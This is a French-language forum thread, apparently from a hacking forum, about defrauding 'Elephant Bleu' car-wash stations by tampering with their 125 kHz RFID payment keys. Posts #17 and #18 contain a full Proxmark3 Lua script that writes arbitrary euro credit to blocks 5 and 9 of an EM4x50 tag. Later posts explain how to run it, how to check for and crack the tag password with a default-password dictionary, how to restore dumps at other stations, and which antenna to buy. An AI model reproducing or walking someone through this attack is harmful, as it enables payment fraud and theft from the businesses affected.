Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 24147

Clé de lavage bleue presque gratuit (lavage auto)

by spoofhub - 11 March, 2023 - 06:13 PM
This post is by a banned member (ena9128) - Unhide
ena9128  
Registered
3
Posts
0
Threads
1 Year of service
#17
J’ai essayé avec un flipper zéro et un proxmark3 mais sans succès. Je vous joins l’intérieur du fichier que j’ai réussis à obtenir si vous pouvez m’aider merci beaucoup

local getopt = require('getopt')
--local utils = require('utils')
local ansicolors = require('ansicolors')

copyright = ''
author = "Abou"
version = 'v1.1.0'
desc = [[
Ce script permet de lancer une boucle pour les clefs elephant bleu difficile a detecter
]]

example = [[

-- dump d'une cle
script run 1 -dump

-- affichage de l'aide
script run 1 -h

-- credit de 50 euros
script run 1 -S 50

-- recherche de badge LF
script run 1 -c

-- scan en changeant la frequence LF de 100khz à 150khz
script run 1 -scan

]]
usage = [[

script run Abou_ElephantBleu [-dump] [-h] [-S 'somme'] [-c]
]]
arguments = [[

-h : this help
-dump : lecture du dump
-S .. : ecriture de ..euros
-c : recherche de badge LF
-b : lance un code au choix en boucle
-scan : scan de 100khz a 150khz
]]

local DEBUG = false
local bxor = bit32.bxor
---
-- A debug printout-function
local function dbg(args)
if not DEBUG then return end
if type(args) == 'table' then
local i = 1
while args do
dbg(args)
i = i+1
end
else
print('###', args)
end
end
---
-- This is only meant to be used when errors occur
local function oops(err)
print('ERROR:', err)
core.clearCommandBuffer()
return nil, err
end
------------------------------------------------------------------------------------------------
-- Usage help
local function help()
print(copyright)
print(author)
print(version)
print(desc)
print(ansicolors.cyan..'Usage'..ansicolors.reset)
print(usage)
print(ansicolors.cyan..'Arguments'..ansicolors.reset)
print(arguments)
print(ansicolors.cyan..'Example usage'..ansicolors.reset)
print(example)
end
---raccourci
local acgreen = ansicolors.bright..ansicolors.green
local accyan = ansicolors.bright..ansicolors.cyan
local acred = ansicolors.red
local acyellow = ansicolors.bright..ansicolors.yellow
local acblue = ansicolors.bright..ansicolors.blue
local acmagenta = ansicolors.bright..ansicolors.magenta
local acoff = ansicolors.reset
--- COMMANDE
local function commande(nb,a)
if nb == 1 then core.console('lf search') end
if nb == 2 then core.console(string.format('lf config -f %s',a)) end
if nb == 3 then core.console('lf config --125')end
if nb == 4 then core.console('lf em 4x50 dump')end
if nb == 5 then core.console(string.format('Lf em 4x50 wrbl -b 5 -d %s',a))end
if nb == 6 then core.console(string.format('Lf em 4x50 wrbl -b 9 -d %s',s))end
end
--- fonction wait
function wait(time)
local duration = os.time() + time
while os.time() < duration do end
end
--- forcage nb de caractere
local function zfill(nb, val)
val = '00000000'..val
val = string.sub(val, nb)
return val
end
--- conversion
local function credit(a)
s = zfill(-8,string.format("%x", (a*10)),16)
end
--- recherche de badge LF
local function search(rep)
print(acgreen..'recherche de badge LF'..acoff)
for i=1,rep do
commande(1)
end
end
--- boucle au choix
local function code(rep)
print(acgreen..'Quelle boucle souhaitez vous lancer?'..acoff)
a = io.read()
for i=1,rep do
core.console(a)
wait(0.01)
end
end
--- scanne les frequences basses
local function scan()
print(acgreen..'scanne en cours'..acoff)
for i=100,150 do
commande(2,i)
commande(1)
end
print(acgreen..'parametre remis a 125Khz'..acoff)
commande(3)
end
--- lecture de cle
local function dump()
print(acgreen..'lecture du dump en cours'..acoff)
for i=1,rep do
commande(4)
end
end
--- ecriture sur cle
local function write(a, s, rep)
print(string.format(acgreen..'ecriture de %s euros sur bloc 5 et 9',a)..acoff)
print(acyellow..('bloc='..s)..acoff)
for i=1,rep do
commande(5,s)
commande(6,s)
end
end
-- choix nomnre de boucle
local function boucle()
print(acblue..' nombre de boucle?'..acoff)
rep = 1
end
-- depart du programme Main
function main(args)

for o, a in getopt.getopt(args, 'S:') do
if o == 'S' then boucle();credit(a);write(a, s,rep) end
end
if args == '-h' or args == '' or args == '-help' then return help() end
if args == '-dump' then boucle();dump(rep) end
if args == '-c' then boucle();search(rep) end
if args == '-b' then boucle();code(rep) end
if args == '-scan' then scan() end
end
main(args)
This post is by a banned member (y37h) - Unhide
y37h  
Registered
11
Posts
0
Threads
1 Year of service
#18
(10 October, 2023 - 05:07 PM)ena9128 Wrote: Show More
J’ai essayé avec un flipper zéro et un proxmark3 mais sans succès. Je vous joins l’intérieur du fichier que j’ai réussis à obtenir si vous pouvez m’aider merci beaucoup

local getopt = require('getopt')
--local utils = require('utils')
local ansicolors = require('ansicolors')

copyright = ''
author = "Abou"
version = 'v1.1.0'
desc = [[
Ce script permet de lancer une boucle pour les clefs elephant bleu difficile a detecter
]]

example = [[

-- dump d'une cle
script run 1 -dump

-- affichage de l'aide
script run 1 -h

-- credit de 50 euros
script run 1 -S 50

-- recherche de badge LF
script run 1 -c

-- scan en changeant la frequence LF de 100khz à 150khz
script run 1 -scan

]]
usage = [[

script run Abou_ElephantBleu [-dump] [-h] [-S 'somme'] [-c]
]]
arguments = [[

-h : this help
-dump : lecture du dump
-S .. : ecriture de ..euros
-c : recherche de badge LF
-b : lance un code au choix en boucle
-scan : scan de 100khz a 150khz
]]

local DEBUG = false
local bxor = bit32.bxor
---
-- A debug printout-function
local function dbg(args)
if not DEBUG then return end
if type(args) == 'table' then
local i = 1
while args do
dbg(args)
i = i+1
end
else
print('###', args)
end
end
---
-- This is only meant to be used when errors occur
local function oops(err)
print('ERROR:', err)
core.clearCommandBuffer()
return nil, err
end
------------------------------------------------------------------------------------------------
-- Usage help
local function help()
print(copyright)
print(author)
print(version)
print(desc)
print(ansicolors.cyan..'Usage'..ansicolors.reset)
print(usage)
print(ansicolors.cyan..'Arguments'..ansicolors.reset)
print(arguments)
print(ansicolors.cyan..'Example usage'..ansicolors.reset)
print(example)
end
---raccourci
local acgreen = ansicolors.bright..ansicolors.green
local accyan = ansicolors.bright..ansicolors.cyan
local acred = ansicolors.red
local acyellow = ansicolors.bright..ansicolors.yellow
local acblue = ansicolors.bright..ansicolors.blue
local acmagenta = ansicolors.bright..ansicolors.magenta
local acoff = ansicolors.reset
--- COMMANDE
local function commande(nb,a)
if nb == 1 then core.console('lf search') end
if nb == 2 then core.console(string.format('lf config -f %s',a)) end
if nb == 3 then core.console('lf config --125')end
if nb == 4 then core.console('lf em 4x50 dump')end
if nb == 5 then core.console(string.format('Lf em 4x50 wrbl -b 5 -d %s',a))end
if nb == 6 then core.console(string.format('Lf em 4x50 wrbl -b 9 -d %s',s))end
end
--- fonction wait
function wait(time)
local duration = os.time() + time
while os.time() < duration do end
end
--- forcage nb de caractere
local function zfill(nb, val)
val = '00000000'..val
val = string.sub(val, nb)
return val
end
--- conversion
local function credit(a)
s = zfill(-8,string.format("%x", (a*10)),16)
end
--- recherche de badge LF
local function search(rep)
print(acgreen..'recherche de badge LF'..acoff)
for i=1,rep do
commande(1)
end
end
--- boucle au choix
local function code(rep)
print(acgreen..'Quelle boucle souhaitez vous lancer?'..acoff)
a = io.read()
for i=1,rep do
core.console(a)
wait(0.01)
end
end
--- scanne les frequences basses
local function scan()
print(acgreen..'scanne en cours'..acoff)
for i=100,150 do
commande(2,i)
commande(1)
end
print(acgreen..'parametre remis a 125Khz'..acoff)
commande(3)
end
--- lecture de cle
local function dump()
print(acgreen..'lecture du dump en cours'..acoff)
for i=1,rep do
commande(4)
end
end
--- ecriture sur cle
local function write(a, s, rep)
print(string.format(acgreen..'ecriture de %s euros sur bloc 5 et 9',a)..acoff)
print(acyellow..('bloc='..s)..acoff)
for i=1,rep do
commande(5,s)
commande(6,s)
end
end
-- choix nomnre de boucle
local function boucle()
print(acblue..' nombre de boucle?'..acoff)
rep = 1
end
-- depart du programme Main
function main(args)

for o, a in getopt.getopt(args, 'S:') do
if o == 'S' then boucle();credit(a);write(a, s,rep) end
end
if args == '-h' or args == '' or args == '-help' then return help() end
if args == '-dump' then boucle();dump(rep) end
if args == '-c' then boucle();search(rep) end
if args == '-b' then boucle();code(rep) end
if args == '-scan' then scan() end
end
main(args)

Salut,

Avec le proxmark 3, j'ai réussi. 
J'ai du changer l'antenne par contre, par celle là :
CP-491UH-ID142-H2 Antenne RFiD 125kHz Øext: 22mm Øint: 14mm H: 2mm 491uH SR PASS


Après ça, la détection se fait bien. J'ai bypass le script LUA car je n'arrivais pas à le faire fonctionner.
This post is by a banned member (ena9128) - Unhide
ena9128  
Registered
3
Posts
0
Threads
1 Year of service
#19
Bonjour, j’ai reçu l’antenne effectivement j’arrive à détecter la clé très facilement maintenant mais je suis un peu perdu pour faire un dump ou écrire directement sur le block 5 et 9….

Si tu peux expliquer ta méthode ça m’arrangerait merci d’avance
This post is by a banned member (fazer_59) - Unhide
fazer_59  
Registered
25
Posts
0
Threads
#20
(This post was last modified: 28 November, 2023 - 07:48 PM by fazer_59. Edited 2 times in total.)
Bonsoir, pour faire fonctionner ce script il faut le mettre dans pm3/client/luascripts, ensuite lancer la cmd avec un pm3 :
script run Elephant -h pour voir les cmds interne .Sinon pour juste mettre des € script run Elephant -S il va vous demandez le nbrs de boucle ? cela en fonction de votre antenne LF verifier le voltage avec un hw tune en dessous de 29v pas terrible.

Voila je remercie notre ami Abou pour ce script très utile.

Re, verifier que votre key n'a pas de pwd avec cette cmd: lf em 4x50 info.

---- Configuration ----
first word read.... 0
last word read..... 0
password check..... off
read after write... off

--------- Protection ------------
first word read protected.... 0
last word read protected..... 0
first word write inhibited... 0
last word write inhibited.... 0

zero values may indicate read protection

car s'il y a un pwd il le faudra pour écrire.


[usb] pm3 --> lf em 4x50 chk
treating file as T55xx keys
[+] loaded 123 keys from dictionary file C:\ProxSpace\ProxSpace-master\pm3\proxmark3\client\dictionaries/t55xx_default_pwds.dic
You can cancel this operation by pressing the pm3 button
[-]Remaining keys: 123
[+] found valid password [ 00000000 ]

[+] time in check pwd 2 seconds

Ah oui, si vous avez plusieurs dump dans différents endroit avec sans pwd vous pouvez juste faire une lf em 4x50 restore -f mydump.eml & c'est bon vous pouvez lavé dans une autre station avec la méme key.
This post is by a banned member (fazer_59) - Unhide
fazer_59  
Registered
25
Posts
0
Threads
#21
Bonjour, pour lire cette key avec un acr122u pas possible car il gère pas la fréquence 125khz " LF ".

Bonne aprem
This post is by a banned member (Patdu13) - Unhide
Patdu13  
Registered
15
Posts
0
Threads
#22
can we build an antenna ourselves to pick up the frequency because I spent hours finding my dumps
This post is by a banned member (fazer_59) - Unhide
fazer_59  
Registered
25
Posts
0
Threads
#23
(This post was last modified: 30 January, 2024 - 06:46 PM by fazer_59. Edited 1 time in total.)
Hello, yes you can build an antenna yourself, you can also order this model which works well for a pm3 easy.

https://www.tme.eu/fr/details/cp-491uh-i...-passives/

Salut,

Avec le proxmark 3, j'ai réussi. 
J'ai du changer l'antenne par contre, par celle là :
CP-491UH-ID142-H2 Antenne RFiD 125kHz Øext: 22mm Øint: 14mm H: 2mm 491uH SR PASS Merci à Y37H .
This post is by a banned member (Patdu13) - Unhide
Patdu13  
Registered
15
Posts
0
Threads
#24
Merci fazer comment faire pour trouvé le password de la clé j'ai essayer de créer un fichier lua mais ses pas bon je sais pas si tout le monde a le même mots de pass

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 2 Guest(s)